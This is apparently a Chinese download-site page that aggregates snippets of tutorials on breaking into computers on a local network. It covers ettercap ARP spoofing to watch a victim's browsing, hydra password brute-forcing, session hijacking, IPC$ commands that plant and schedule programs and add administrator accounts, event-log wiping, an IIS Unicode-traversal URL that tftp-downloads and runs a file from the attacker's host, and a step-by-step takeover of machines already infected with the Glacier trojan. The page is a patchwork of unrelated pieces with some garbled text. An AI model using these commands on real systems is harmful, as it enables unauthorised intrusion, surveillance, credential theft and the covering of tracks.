精华内容
下载资源
问答
  • 局域网入侵工具 扫描

    2009-10-16 13:52:53
    自己看吧 很简单 [window position] top=47 left=127 width=821 height=533 [panel position] left_panel=249 bottom_panel=118 [Dock] RightDockPanel=alRight [NBT_IP] IP1= IP2= ...save_nbt=no
  • 今天安仔为大家推荐的工具是linux下运行的入侵工具EtterCap。再次声明,本教程仅供学习交流使用,不得用于非法途径,请大家守住自己的底线,做个有道德的网民。我们在对WEB安全检测的时候都会用到Cain和netfuke这两款...

    今天安仔为大家推荐的工具是linux下运行的入侵工具EtterCap。再次声明,本教程仅供学习交流使用,不得用于非法途径,请大家守住自己的底线,做个有道德的网民。

    我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。

    而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。

    e20959442615a04c6de168bc692fb608.png

    简单来说,EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。

    借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。ettercap几乎是每个渗透测试人员必备的工具之一。

    今天演示一下EtterCap简单入侵获取目标浏览图片!首先打开kali选择应用中心下拉选项中的嗅探/欺骗选项里的EtterCap,或者在终端里输入ettercap -G

    740eec4c6fa5567857702a71a900928a.png

    点击打开后右上选择Sniff选项里的Unified sniffing(嗅探模式)或者Ctrl+U设置好要嗅探的网卡(一般都是eth0),开始嗅探。

    3685a1b65f6a98f397851f3db65358ca.png

    嗅探局域网内的所有存活主机,选择Hosts下拉选项里的Hosts list选项。

    8da3354ad8adc5c24dfbb104d55899ca.png
    c1f461763ce445586c7a28811b796d64.png

    开启中间人监听模式,将要监听的两端分别添加到Target1、Target2,然后选择mitm下拉选项里的arp posoning选项 ,勾选sniff remote connections(嗅探并保持原连接状态)点击确定。

    28830fa028ae484e257485bf29b43b76.png
    b5a9ac23ab8a6064eeec7e7a6a84a2e7.png
    7dcb55d9b04f7fd76490263cb1c341ed.png

    查看被监听主机之间的所有连接信息,选择View下拉选项里的Connections选项。

    2d2feefbcca39f17ca019d9efa263ba9.png

    打开一个终端,输入:ettercap -i eth0 -Tq -M arp:remote //目标ip// //自己ip//,开启中间人监听;再打开一个终端,输入:driftnet -i eth0 ,就可以截获目标正在浏览的图片了。

    c1800c83ee7ad689c361d05b771e05a8.png
    2957b5c695548d4f34145a5757dd60f3.png
    845e0a073bfe72371dd1270cee685eec.png

    目标主机和攻击者必须在同一个局域网内。在截取图片时,目标主机需得在攻击者窃听后开启浏览器浏览带图片的网页,然后才会获取到图片。

    再次声明:本教程仅供学习使用,不得用于非法途径。

    小白入行网络安全、混迹安全行业找大咖,以及更多成长干货资料,欢迎关注@安界人才培养计划

    如果你想学习渗透测试(注:渗透测试指模拟恶意黑客攻击进行安全测试)相关知识,可以先私信回复【领券】,即可领取小白学渗透专属499减400的小白学渗透专用券,先领券,后学习,更实惠!

    如果你想加入“黑客”安全交流群,欢迎大家私信回复 “入群” ,加入安界网安全大咖学习交流群,一起学习,一起进步哦!

    我是安仔,一名刚入职网络安全圈的网安萌新,欢迎关注我,跟我一起成长。

    展开全文
  • 一些内网的,命令行格式的工具,可以来看看,很简单
  • 一款集局域网入侵查看嗅探为一身的强大软件,破解版的。
  • .001 ZantiZanti是由Zimperium公司打造的Android平台下的渗透测试工具包。Zanti支持两种中间人攻击方式,分别为MIMT攻击和ARP攻击,中间人内带有多个攻击模块,例如MAC地址欺骗,会话劫持,漏洞检查,密码审核,网络...

    .001 Zanti

    Zanti是由Zimperium公司打造的Android平台下的渗透测试工具包。

    Zanti支持两种中间人攻击方式,分别为MIMT攻击和ARP攻击,中间人内带有多个攻击模块,例如MAC地址欺骗,会话劫持,漏洞检查,密码审核,网络扫描,SSL条等等...

    Zanti除中间人外,还有许多小功能,例如MAC地址转换器,开钓鱼热点,路由器后门大全,WiFi信号检测器,HTTP服务器等等...

    想使用zanti必须要有root,另外zanti内置busybox阉割版,无需额外安装busybox。

    本教程将带来解决Android 8.0和Android 8.1使用Zanti卡死的解决办法

    Zanti操作说明:

    1.一部带有root的手机

    2.zanti优化版软件(进群在群文件分享下载)

    3.带有WiFi的测试环境

    【局域网扫描】

    首先安装软件:安装后打开,提示root权限请点击允许

    b550f7382433119488a02cf9764c459a.png

    首次打开软件后直接无脑下一步即可

    8d83d300e56a509918bec9d994039d64.png

    进入主界面后点击上方状态的刷新按钮

    13f6e0343673174e42db967f2bfa2ae5.png

    点击刷新后只需等待自动扫描结束即可,就会看到扫描出的局域网内所有主机

    5229fa6890d6d238ea12503480e7204a.png

    其中带有ip为192.168..1/24的是表示整个网段,192.168..1一般代表的是路由器ip,以上两个ip均不可攻击,否则会报错

    6176829d236d67d9ed8c2b0d5ecd96e6.png

    首先要确定要攻击主机的IP,可以接住轻松上网等其它软件来查询电脑手机对应的IP型号,这里是用我自己的电脑当作演示攻击机,所以就不用其它软件辅助扫描,直接在演示机查看ip即可

    6b7ebb64d704fa3b87ecc4c4d6fcd55c.png

    手机版查ip的方法一般在设置wif里面可以看到

    acc000c08b2b7e8994db710d48cfb2ea.png

    查找到ip后,回到zanti主界面点击上方状态的放大镜进行过滤查找ip

    d061128aac6954f95afb4a3cd4f951a9.png

    输入刚刚查看到的ip的d段即可

    d5407b02305a1459f0d4f7c6122593cc.png

    点击确定后在主界面第二个就是需要攻击的主机(第一个是整个网段,请勿攻击,否则zanti将会报错)

    c1d5a07dd4a928ad792f9032c5e089bb.png

    点击要攻击的主机IP后会看到以下界面

    ab2dc21e456e616bdabe70d90d2acf1c.png

    在状态栏首先会看到关于主机的信息

    58c5718c6db9c34f56eb60e68fa55e6d.png

    状态栏左侧是评论区,可以写下对此主机的评论,可以记录一些都对主机干了一些什么事

    0da7ede79ca98376dd1220cecb9dab79.png

    状态栏右侧是zanti用自身nmap的常规扫描记录

    0d50d0779c3f33a1e50ab73d0bd77f33.png

    中间部分及下方部分即是对主机的攻击模块,分别有 扫描模块(nmap经典老牌端口扫描工具)、端口远程链接模块(需安装其它软件配合使用)、端口复杂度审计模块(hydra九头蛇经典老牌端口爆破工具)、shellshock和ssl poodle就不多介绍了均没什么实际用途

    ab8aa67c021cdb261d7115edd343a3bf.png

    0x04 【扫描】

    这里的扫描即是集成了电脑阉割版的nmap

    Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络,当然用它扫描单个主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机,那些主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息),它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap通常用于安全审核,许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息, 管理服务升级计划,以及监视主机和服务的运行。

    首先选择扫描功能

    2152df9c77803a952dbc1818b80ecadd.png

    进入界面后会看到三个选项,这里先选择第一个选项,“扫描类型”

    0452b8bab851ac539e66b55537c6c22c.png

    选择要扫描的类型,这里要调用脚本扫描,所以选择Run Script

    3f3be80b97a3524892b54b1ef92d4f30.png

    下面开始选择脚本

    434c7c1cb6828b7c7a0b643a738003b6.png

    点开后选择博主新增加的NewScript选项,NewScript内包含了590个nmap的扫描脚本

    d6d462ec63da34ef858f0e99d953f34e.png

    在新增590个脚本内选择适合自己想要扫描的脚本,这里我选择扫描微软系统高危漏洞“永恒之蓝”(MS17-010)的脚本,这里要说明一下正常电脑版直接就可以扫描主机的全部常规漏洞,而zanti的内置nmap是阉割版本,所以只能逐个扫描漏洞

    732ac78663058610f880a9886997cde9.png

    选择好自己要扫描的脚本后,会看到第三项智能扫描,这里因为已经选择了自己想要扫描的脚本,所以这里关闭智能扫描,下面点击前往开始扫描

    db10f473ac7a652ce0f42b8cf610fa50.png

    点击前往后会返回到主界面,稍等片刻后即可

    f7ef3d4a2ce0b5e1e51f3ef07a72cd9e.png

    1.手动扫描成功

    2.重新扫描

    3.查看扫描日志

    4.关闭窗口

    由于第一选项是重新扫描,第三选项是关闭窗口,这里点击第二项,就是查看扫描结果,如果看不懂的小伙伴请复制粘贴到百度翻译一下即可

    6b6d215ae63362341e68ff5d41ffc650.png

    0x05 【密码复杂度审计及连接至远程端口】

    密码复杂性审计功能即是暴力破解的意思,这里zanti是综合了又一经典老牌工具“hydra”(九头蛇)端口爆破工具

    这里之所以把密码复杂度审计和连接至远程端口两个功能放在一起,是因为先要爆破到账号密码,才能使用连接至远程端口功能

    海德拉(Hydra)是希腊神话中的九头蛇。同时,它也是较为常见的linux下密码破解工具,它简单易用的模式以及破解多种服务密码的强大功能,使它受到了广泛的欢迎。

    密码破解需要三个重要的元素:

    1、一个好的密码破解工具2、一个优秀的密码字典3、足够的耐心与等待

    有了hydra之后需要有一个用户密码字典,字典中有着用户可能出现的所有密码,这当然不是人手工生成的,需要密码机批量的产生。密码生成工具有很多,比如Cupp,这里就不做详细介绍了。

    首先选择密码复杂度审计

    7e34ac8025b3ec1f7e6012c02b563b7a.png

    在这里破解方式最好选择自定义破解,字典包自备,这里要说明一下,自制字典包首先需要信息收集,只有收集到足够的信息才能做出足够强大的字典包

    0f2ccfce4c48655dd3ee3aaf64ff01df.png

    下面是选择爆破协议,这里根据自己针对性选择

    12ca35412408bcdaf8c93af8bdae3951.png

    选择后会自动跑包

    7faaca956753bb6c14e497153e1d6917.png

    跑的时间是由字典包大小决定的

    924aa6ae4a79ccfcfa98eb9754fd39c7.png

    下面开始远程连接至远程端口教程

    1cc6cac100ef5889ad04123a2672c98a.png

    我这里选择连接ssh,已知ssh连接端口是22,所以这里选择22

    882c1bc7598f41461917522ce1e57777.png

    下一步是选择账号密码

    6c987b858b9887e05a37c632dc7c951b.png

    点击前往即可,跳转到手机可以连接ssh的软件

    3d4f3c6146872a0673e5792437787b0e.png

    0x06 【中间人】

    中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且当今仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。

    随着计算机通信网技术的不断发展,MITM攻击也越来越多样化。最初,攻击者只要将网卡设为混杂模式,伪装成代理服务器监听特定的流量就可以实现攻击,这是因为很多通信协议都是以明文来进行传输的,如HTTP、FTP、Telnet等。后来,随着交换机代替集线器,简单的嗅探攻击已经不能成功,必须先进行ARP欺骗才行。如今,越来越多的服务商(网上银行,邮箱登陆)开始采用加密通信,SSL(Secure Sockets Layer 安全套接层)是一种广泛使用的技术,HTTPS、FTPS等都是建立在其基础上的。

    当主机A、和主机B通信时,都由主机C来为其“转发”,如图一,而A、B之间并没有真正意思上的直接通信,他们之间的信息传递同C作为中介来完成,但是A、B却不会意识到,而以为它们之间是在直接通信。这样攻击主机在中间成为了一个转发器,C可以不仅窃听A、B的通信还可以对信息进行篡改再传给对方,C便可以将恶意信息传递给A、B以达到自己的目的。

    当A、B通信时,C不主动去为其“转发”,只是把他们的传输的数据备份,以获取用户网络的活动,包括账户、密码等敏感信息,这是被动攻击也是非常难被发现的。

    实施中间人攻击时,攻击者常考虑的方式是ARP欺骗或DNS欺骗等,将会话双方的通讯流暗中改变,而这种改变对于会话双方来说是完全透明的。以常见的DNS欺骗为例,目标将其DNS请求发送到攻击者这里,然后攻击者伪造DNS响应,将正确的IP地址替换为其他IP,之后你就登陆了这个攻击者指定的IP,而攻击者早就在这个IP中安排好了一个伪造的网站如某银行网站,从而骗取用户输入他们想得到的信息,如银行账号及密码等,这可以看作一种网络钓鱼攻击的一种方式。对于个人用户来说,要防范DNS劫持应该注意不点击不明的连接、不去来历不明的网站、不要在小网站进行网上交易,最重要的一点是记清你想去网站的域名,当然,你还可以把你常去的一些涉及到机密信息提交的网站的IP地址记下来,需要时直接输入IP地址登录。

    要防范MITM攻击,可以将一些机密信息进行加密后再传输,这样即使被“中间人”截取也难以破解,另外,有一些认证方式可以检测到MITM攻击。比如设备或IP异常检测:如果用户以前从未使用某个设备或IP访问系统,则系统会采取措施。还有设备或IP频率检测:如果单一的设备或IP同时访问大量的用户帐号,系统也会采取措施。更有效防范MITM攻击的方法是进行带外认证,具体过程是:系统进行实时的自动电话回叫,将二次PIN码发送至SMS(短信网关),短信网关再转发给用户,用户收到后,再将二次PIN码发送到短信网关,以确认是否是真的用户。带外认证提供了多种不同的认证方式及认证渠道,它的好处是:所有的认证过程都不会被MITM攻击者接触到。例如MITM是通过中间的假网站来截获敏感信息的,相关的“带外认证”就是指通过电话认证或短信认证等方式确认用户的真实性,而MITM攻击者却不能得到任何信息。当然,这种方式麻烦些

    zanti刚好简化了以上功能,可以用手机就可以实现简单的中间人攻击

    .002 Bugtroid

    Bugtroid是Bugtraq-Team团队开发的安全检测工具,该apk的主要特征是,它有200多个Android和Linu x工具(PRO),可以帮助渗透测试人员进行智能手机的 安全评估工作。

    fae83a2a8b5b6bda485dea001d00ad0a.png

    功能实现:

    802.11无线评估 网络探测 远程连接 DDos 嗅探 渗透 安全检测...等等诸多功能于一体这里不做过多介绍自己体验开发

    2fa81f86ba665c565bac83dc107b78d0.png
    6b359d8ac2d8481d11f21b70bda18599.png
    7eeddfce7034869f23116f2908cbb35a.png

    .003 DroidSheep

    DroidSheep是一款Android平台上的安全测试工具,可以用来进行web session劫持等安全测试。它能够监听通过无线传输的HTTP包并且提取其中的会话ID。

    bc4051aa4ea0016f1289eae43a374e7b.png

    关于ARP欺骗攻击

    ARP(Address Resolution Protocol)是地址解析协议,是一种将IP地址转化成物理地址的协议。局域网通信是通过MAC地址作为门牌号的,我们通过ARP投毒实现针对主机的欺骗。

    测试环境

    Mx4 (检测机)

    android-d92b72c70cc30a44   192.168.0.3  38:bc:1a:b8:97:98

    Xiaomi(攻击机)

    android-7469d8f8181f48dd    192.168.0.4  c4:6a:b7:ff:90:36

    网关

    C:甥敳獲iruo>arp-aInterface:192.168.0.5 --- 0x3Internet Address      Physical Address      Type192.168.0.1           c0-a0-bb-ba-90-ae     dynamic

    ARP欺骗攻击测试

    开启DroidSheep欺骗并劫持会话

    514ccfe2097e8f855c3fc3c7dd0f8d8b.png

    Wireshark抓包

    2dfffb136049fc88c3620707d95290ef.png

    攻击机发送arp欺骗包,192.168.0.1 at 90:36,网关欺骗。这是受害者(笔记本)收到arp包将修改自己的arp缓存。

    2b3f1f1029d871c88565bcade7f6b98c.png

    登陆百度

    所以说使用公共WiFI还是很危险滴,说不定你喝着咖啡听着歌就被对面的屌丝修改了微博头像。

    37ae91438335ac14559d5bf59e1b5a24.png
    展开全文
  • 一些简单的局域网入侵命令

    千次阅读 2012-07-09 09:21:27
    一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 想要连接到某处: nc [-options] hostname port[s] [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog...
    (与远程主机建立空管连接) net use \\IP地址\ipc$ " " /use:" " 
    

    (以管理员身份登录远程主机) net use \\IP地址\ipc$ " 密码" /use:" Administrator"

    (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$

    (查看远程主机时间) net time \\IP地址

    (定时启动某个程序) at \\IP地址 02:18 readme.exe

    (查看共享) net view \\IP地址

    (查看netbios工作组列表) nbtstat -A IP地址

    (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ " " /user:" Administrator"

    (这两条把自己增加到管理员组): net user 用户名 密码 /add

    net localgroup Administrators 用户名 /add


    一、netsvc.exe

    下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“ 时间任务” 服务:

    netsvc /list \\IP地址

    netsvc schedule \\IP地址 /query

    netsvc \\IP地址 schedule /start


    二、OpenTelnet.exe

    远程启动主机的Telnet服务,并绑定端口到7878,例如:

    OpenTelnet \\IP地址 用户名 密码 1 7878

    然后就可以telnet到主机的7878端口,进入DOS方式下:

    telnet IP地址 7878


    三、winshell.exe

    一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD> 后,可打下面的命令:

    p Path (查看winshell主程序的路径信息)

    b reBoot (重新启动机器)

    d shutDown (关闭机器)

    s Shell (执行后你就会看到可爱的“ C:\> ” )

    x eXit (退出本次登录会话,此命令并不终止winshell的运行)

    CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)


    四、3389登陆器,GUI方式登录远程主机的


    五、elsave.exe

    事件日志清除工具

    elsave -s \\IP地址 -l " application" -C

    elsave -s \\IP地址 -l " system" -C

    elsave -s \\IP地址 -l " security" -C

    执行后成功清除应用程序日志,系统日志,安全日志


    六、hbulot.exe

    开启win2kserver和winxp的3389服务

    hbulot [/r]

    使用/r表示安装完成后自动重起目标使设置生效。


    七、nc.exe(netcat.exe)

    一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

    想要连接到某处: nc [-options] hostname port[s] [ports] ...

    绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

    参数:

    -e prog 程序重定向,一旦连接,就执行 [危险!!]

    -g gateway source-routing hop point[s], up to 8

    -G num source-routing pointer: 4, 8, 12, ...

    -h 帮助信息

    -i secs 延时的间隔

    -l 监听模式,用于入站连接

    -n 指定数字的IP地址,不能用hostname

    -o file 记录16进制的传输

    -p port 本地端口号

    -r 任意指定本地及远程端口

    -s addr 本地源地址

    -u UDP模式

    -v 详细输出— — 用两个-v可得到更详细的内容

    -w secs timeout的时间

    -z 将输入输出关掉— — 用于扫描时


    八、TFTPD32.EXE

    把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

    http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

    然后可以直接令文件运行:

    http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名


    九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“ 溢出后在一个端口监听” ,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。


    十、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

    十一、 Xscan命令行运行参数说明:

    在检测过程中,按" [空格]" 键可以查看各线程状态及扫描进度,按" q" 键保存当前数据后提前退出程序,按" " 强行关闭程序。

    1.命令格式: xscan -host [-] [其他选项]

    xscan -file [其他选项]

    其中 含义如下:

    -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的" PORT-SCAN-OPTIONS\PORT-LIST" 项定制待检测端口列表);

    -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

    -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

    -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的" CGI-ENCODE\encode_type" 项设置编码方案);

    -iis : 检测IIS漏洞(可通过\dat\config.ini文件的" CGI-ENCODE\encode_type" 项设置编码方案);

    [其他选项] 含义如下:

    -v: 显示详细扫描进度

    -p: 跳过Ping不通的主机

    -o: 跳过没有检测到开放端口的主机

    -t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10
    展开全文
  • 想用灰鸽子或其他方法控制(或以其他的方式入侵)那台电脑。我和对方的操作系统是XP。已经有的工具是流光,灰鸽子,嗅探器和一些端口扫描工具。经扫描,对方21端口开放。其他未知。希望高手提供针对性的步骤,最好有...

    6ddf5242ab65c4a6657ab9d8127f99db.gif

        我和另一台电脑同在一个局域网下,对方IP已知,用户名和密码未知。 想用灰鸽子或其他方法控制(或以其他的方式入侵)那台电脑。 我和对方的操作系统是XP。已经有的工具是流光,灰鸽子,嗅探器和一些端口扫描工具。经扫描,对方21端口开放。其他未知。 希望高手提供针对性的步骤,最好有一些解释。不希望看到复制其他网页上的泛泛的解释。 如成功,追加我能给的所有奖分。问题补充: 对方PING不通,不知道为什麽。同样,用好多IPSCANER都扫不到他。 路由器是D-LINK的DI-64型号。我可以修改路由器设置。不能直接接触对方电脑,否则要远程控制干吗。方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。 方法二: 第一步 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 下载完毕并解压缩之后跟我进行第二步! 第二步 运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。 第三步 在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。 第四步 进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。 好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。 第五步 观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。 下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。 第六步 点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。 第七步 在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。 好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。第八步 这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。 第九步 点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!! 第十步 你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址: 1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃! 2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!! 第十一步 如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。 第十二步 如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功! 第十三步 终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了!。

    4c04c446c2ddecadec5ca3ea1b895432.png

    95126a2a7c0ce938163b61f82ccfa94a.png

    baab487f5d1cf04ba89fe047977483f5.gif
    展开全文
  • 无线局域网入侵检测

    2018-05-18 16:37:37
    对经典入侵工具N et Stumbler、Wellenrei ter的入侵机理进行分析, 找到了入侵检 测的方法。据WLAN的两种基本工作模式, 提出了基于主机检测和网络检测相结合的分布式入侵检测模型, 并 给出了实现的模块框架图。结合...
  • 如何进行局域网入侵

    千次阅读 2021-06-24 13:28:06
    局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能,那么如何进行局域网入侵呢?今天就来和大家一起看看局域网入侵方法。入侵局域网电脑方法一1、 下载必备的...
  • 局域网入侵查看是一款不错的工具局域网入侵查看是一款不错的工具
  • 局域网查看入侵工具(LanSee) 1.72 可以查看局域网内的任何开放共享的文件 功能强大 有可能被杀软误报病毒 请关闭杀软防火墙后重试 密码 123
  • 对于局域网入侵,一般无需任务工具软件,特别是校园的实验室网络,完全可以利用系统本身的工具来实现。在运行中输入cmd,然后输入netview即可查看局域网内的所有计算机,由于默认的telnet服务没有开启,因此在telnet...
  • Feem是一款非常好用的局域网文件传输工具,软件可以将同一局域网内的不同设备连接到一起,传输文件更加方便,同一局域网下的设备,只要打开Feem就会自动配对连接,发送完了目标设备也就接收完了,免费用户接收的文件...
  • 局域网入侵

    2012-09-24 21:05:00
    入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密...
  • Dos命令入侵局域网电脑

    万次阅读 多人点赞 2015-08-26 17:52:20
    这个命令是网络命令中最重要的一个,必需透彻掌握它每一个子命令的用法,因为它功能实在太强大了这简直就是微软为我提供的最好的入侵工具。首先让我来看一看它都有那些子命令,键入 net /? 回车如图 6 这里,重点...
  • 无线局域网扫描工具

    2015-12-26 21:10:20
    很好的无线网扫描查看工具,监控网络质量,查看是否有非法入侵
  • 那么,黑客在局域网内的入侵有什么常见方式?我们又要采取什么样的保护措施呢?本文也许可以给您一个满意的回答。   防范共享入侵   比如,在某局域网中,服务器装有Win2000 Server系统且采用NTFS分区,...
  • 入侵局域网电脑

    千次阅读 2010-03-10 20:08:00
    1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 下载完毕并解压缩之后跟我进行第二步! 第二步 运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”...
  • 入侵局域网的全攻略

    千次阅读 2010-10-03 20:25:00
    入侵工具:  一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被...
  • 局域网漏洞扫描器

    热门讨论 2013-01-27 18:43:08
    快速入侵局域网局域网漏洞扫描器,可用可扫
  • 局域网共享设置超级工具 局域网互访第一关卡: 系统默认:利用IPC$通道可以建立空连接,匿 名枚举出该机有多少帐户.显然有一定的安全隐患 黑客可以利用扫描器,找到开放IPC$共享的电脑, 匿名枚举出该机的所有用户帐号,...
  • 很好的对入侵检测工具运用的讲解的书 对sniffer snort等工具有详细介绍
  • 首先申明:1.入侵的范围只包括局域网,...入侵工具:一般要用到三个:NTscan变态扫描器,Recton–D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这...
  • 防范局域网内的服务器被入侵(转) 计算机入侵的方式多种多样,如互联网入侵和局域网入侵等,这里笔者想谈谈如何防止服务器在局域网内被人侵的问题。 防范共享入侵 如在一局域网中。服务器安装Windows2000Server...
  • 40多款局域网工具

    万次阅读 2007-09-26 19:06:00
    40多款局域网工具1. 局域网搜索软件(搜索、浏览局域网资源 LanExplorer) 绿色版运行环境: Win9x/NT/2000/XP/ 文件大小: 356 K 软件等级: ★★★★ 软件类别: 国产软件 软件语言: 简体中文 授权方式: 破解版 ...
  • 局域网攻击

    2020-12-07 14:06:41
    目录局域网内的欺骗攻击主要有以下几种:ARP欺骗DNS欺骗NetBIOS名称欺骗和LLMNR欺骗进行内网攻击的第一步是先查看我们自己网卡的配置信息,从而得知内网网段的信息。探测内网信息查看自己网卡配置信息有好多命令,...
  • 原系统的局域网设置条目很多,对此不太熟悉的用户,可能搞得焦头烂额也...多机上网一般是用路由器,此时电脑没有暴露在外网,常用的IPC$入侵方式对路由器无效。此时请运行“开通局域网共享”的批处理,一招解决问题。
  • 一次局域网入侵全过程

    千次阅读 多人点赞 2008-11-09 00:35:00
    一次局域网入侵全过程 首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子。 入侵工具...
